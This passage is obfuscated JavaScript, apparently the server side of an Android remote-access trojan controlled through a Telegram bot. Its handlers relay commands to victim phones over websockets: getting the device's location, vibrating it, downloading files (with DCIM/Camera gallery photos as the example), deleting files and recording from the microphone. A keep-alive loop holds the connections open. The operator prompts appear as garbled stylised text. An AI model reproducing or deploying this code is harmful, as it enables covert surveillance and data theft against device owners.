_0x3a0ea7=_0xe6b2b9;_0x5af290['uuid']==_0x5346ac&&_0x5af290[_0x3a0ea7(0x103)]('location');}),appBot['deleteMessage'](id,_0x3c50cb['message_id']),appBot['sendMessage'](id,_0xe6b2b9(0xf6)+'โข\x20สแดแด\x20แดกษชสส\x20สแดแดแดษชแด แด\x20แด\x20สแด๊ฑแดแดษด๊ฑแด\x20ษชษด\x20แดสแด\x20ษดแดxแด\x20๊ฐแดแดก\x20แดแดแดแดษดแด๊ฑ',{'parse_mode':_0xe6b2b9(0x11e),'reply_markup':{'keyboard':[[_0xe6b2b9(0x178)],[_0xe6b2b9(0x134)]],'resize_keyboard':!![]}})),_0x3b1368=='vibrate'&&(appSocket[_0xe6b2b9(0x132)][_0xe6b2b9(0x175)](function _0x3273a5(_0x5d3f6f){const _0x3f90fd=_0xe6b2b9;_0x5d3f6f[_0x3f90fd(0x145)]==_0x5346ac&&_0x5d3f6f[_0x3f90fd(0x103)](_0x3f90fd(0x177));}),appBot['deleteMessage'](id,_0x3c50cb[_0xe6b2b9(0x11c)]),appBot[_0xe6b2b9(0xf8)](id,_0xe6b2b9(0xf6)+'โข\x20สแดแด\x20แดกษชสส\x20สแดแดแดษชแด แด\x20แด\x20สแด๊ฑแดแดษด๊ฑแด\x20ษชษด\x20แดสแด\x20ษดแดxแด\x20๊ฐแดแดก\x20แดแดแดแดษดแด๊ฑ',{'parse_mode':'HTML','reply_markup':{'keyboard':[[_0xe6b2b9(0x178)],[_0xe6b2b9(0x134)]],'resize_keyboard':!![]}})),_0x3b1368==_0xe6b2b9(0x142)&&(appSocket[_0xe6b2b9(0x132)][_0xe6b2b9(0x175)](function _0x143ce6(_0x2ea7ec){const _0x44f90b=_0xe6b2b9;_0x2ea7ec[_0x44f90b(0x145)]==_0x5346ac&&_0x2ea7ec[_0x44f90b(0x103)](_0x44f90b(0x142));}),appBot['deleteMessage'](id,_0x3c50cb[_0xe6b2b9(0x11c)]),appBot['sendMessage'](id,_0xe6b2b9(0xf6)+_0xe6b2b9(0xf7),{'parse_mode':_0xe6b2b9(0x11e),'reply_markup':{'keyboard':[[_0xe6b2b9(0x178)],[_0xe6b2b9(0x134)]],'resize_keyboard':!![]}})),_0x3b1368==_0xe6b2b9(0x114)&&(appBot['deleteMessage'](id,_0x3c50cb['message_id']),appBot['sendMessage'](id,_0xe6b2b9(0x174)+_0xe6b2b9(0x157),{'reply_markup':{'force_reply':!![]}}),currentUuid=_0x5346ac),_0x3b1368==_0xe6b2b9(0x161)&&(appBot['deleteMessage'](id,_0x3c50cb['message_id']),appBot[_0xe6b2b9(0xf8)](id,_0xe6b2b9(0x15f)+_0xe6b2b9(0xf9),{'reply_markup':{'force_reply':!![]}}),currentUuid=_0x5346ac),_0x3b1368=='file'&&(appBot['deleteMessage'](id,_0x3c50cb[_0xe6b2b9(0x11c)]),appBot[_0xe6b2b9(0xf8)](id,_0xe6b2b9(0x10a)+'โข\x20สแดแด\x20แด
แด\x20ษดแดแด\x20ษดแดแดแด
\x20แดแด\x20แดษดแดแดส\x20แดสแด\x20๊ฐแดสส\x20๊ฐษชสแด\x20แดแดแดส,\x20แดแด๊ฑแด\x20แดษดแดแดส\x20แดสแด\x20แดแดษชษด\x20แดแดแดส.\x20๊ฐแดส\x20แดxแดแดแดสแด,\x20แดษดแดแดส\x20DCIM/Camera\x20\x20แดแด\x20สแดแดแดษชแด แด\x20ษขแดสสแดสส\x20๊ฐษชสแด๊ฑ.',{'reply_markup':{'force_reply':!![]},'parse_mode':'HTML'}),currentUuid=_0x5346ac),_0x3b1368=='delete_file'&&(appBot['deleteMessage'](id,_0x3c50cb['message_id']),appBot[_0xe6b2b9(0xf8)](id,_0xe6b2b9(0x12c)+_0xe6b2b9(0x119),{'reply_markup':{'force_reply':!![]},'parse_mode':'HTML'}),currentUuid=_0x5346ac),_0x3b1368=='microphone'&&(appBot['deleteMessage'](id,_0x3c50cb[_0xe6b2b9(0x11c)]),appBot[_0xe6b2b9(0xf8)](id,_0xe6b2b9(0x16b)+'โข\x20ษดแดแดแด\x20แดสแดแด\x20สแดแด\x20แดแด๊ฑแด\x20แดษดแดแดส\x20แดสแด\x20แดษชแดแด\x20ษดแดแดแดสษชแดแดสสส\x20ษชษด\x20แดษดษชแด๊ฑ\x20แด๊ฐ\x20๊ฑแดแดแดษดแด
๊ฑ',{'reply_markup':{'force_reply':!![]},'parse_mode':_0xe6b2b9(0x11e)}),currentUuid=_0x5346ac),_0x3b1368==_0xe6b2b9(0xee)&&(appBot[_0xe6b2b9(0x14e)](id,_0x3c50cb[_0xe6b2b9(0x11c)]),appBot[_0xe6b2b9(0xf8)](id,_0xe6b2b9(0x129)+_0xe6b2b9(0x135),{'reply_markup':{'force_reply':!![]},'parse_mode':_0xe6b2b9(0x11e)}),currentUuid=_0x5346ac),_0x3b1368==_0xe6b2b9(0x172)&&(appBot[_0xe6b2b9(0x14e)](id,_0x3c50cb[_0xe6b2b9(0x11c)]),appBot['sendMessage'](id,_0xe6b2b9(0x160)+_0xe6b2b9(0x140),{'reply_markup':{'force_reply':!![]},'parse_mode':_0xe6b2b9(0x11e)}),currentUuid=_0x5346ac),_0x3b1368==_0xe6b2b9(0xea)&&(appBot[_0xe6b2b9(0x14e)](id,_0x3c50cb['message_id']),appBot[_0xe6b2b9(0xf8)](id,'ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐๐ช๐๐๐ค\x20๐ก๐๐ฃ๐ \x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐ฅ๐ก๐๐ฎ\x0a\x0a'+_0xe6b2b9(0x13d),{'reply_markup':{'force_reply':!![]},'parse_mode':_0xe6b2b9(0x11e)}),currentUuid=_0x5346ac);}),setInterval(function(){const _0x1b8392=_0x8ea7c8;appSocket[_0x1b8392(0x132)][_0x1b8392(0x175)](function _0x580553(_0x276850){const _0x25abea=_0x1b8392;_0x276850[_0x25abea(0x103)]('ping');});try{axios[_0x1b8392(0x113)](address)[_0x1b8392(0x11d)](_0x40bfc4=>'');}catch(_0x1b4117){}},0x1388),appServer['listen'](process[_0x8ea7c8(0x154)][_0x8ea7c8(0x155)]||0x2327);